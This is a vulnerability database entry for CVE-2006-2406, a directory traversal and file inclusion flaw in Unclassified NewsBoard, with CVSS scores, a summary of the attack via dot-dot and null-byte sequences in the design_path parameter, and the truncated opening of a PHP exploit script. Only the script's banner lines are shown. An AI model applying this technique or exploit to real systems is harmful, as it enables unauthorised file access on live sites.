CVE-2006-2406

Published: 16/05/2006 Updated: 05/09/2008
CVSS v2 Base Score: 2.6 | Impact Score: 2.9 | Exploitability Score: 4.9
VMScore: 265
Vector: AV:N/AC:H/Au:N/C:N/I:P/A:N

Vulnerability Summary

Directory traversal vulnerability in bb_lib/abbc.css.php in Unclassified NewsBoard (UNB) 1.5.3-d and possibly earlier versions, when register_globals is enabled, allows remote malicious users to include arbitrary files via .. (dot dot) sequences and a trailing null byte (%00) in the design_path parameter. NOTE: this is closely related to, but a different vulnerability than, the one involving the ABBC[Config][smileset] parameter.

Vulnerable Product

unclassified newsboard unclassified newsboard

Exploits

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Unclassified NewsBoard <= 161 patch 1 ABBC[Config][smileset] arbitrary\r\n";
echo "local inclusion\r\n";
echo "by rgod rgod@autisticiorg\r\n";
echo "site: retrogodaltervistaorg\r\n\r\n";
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
/* 153 patch lev ...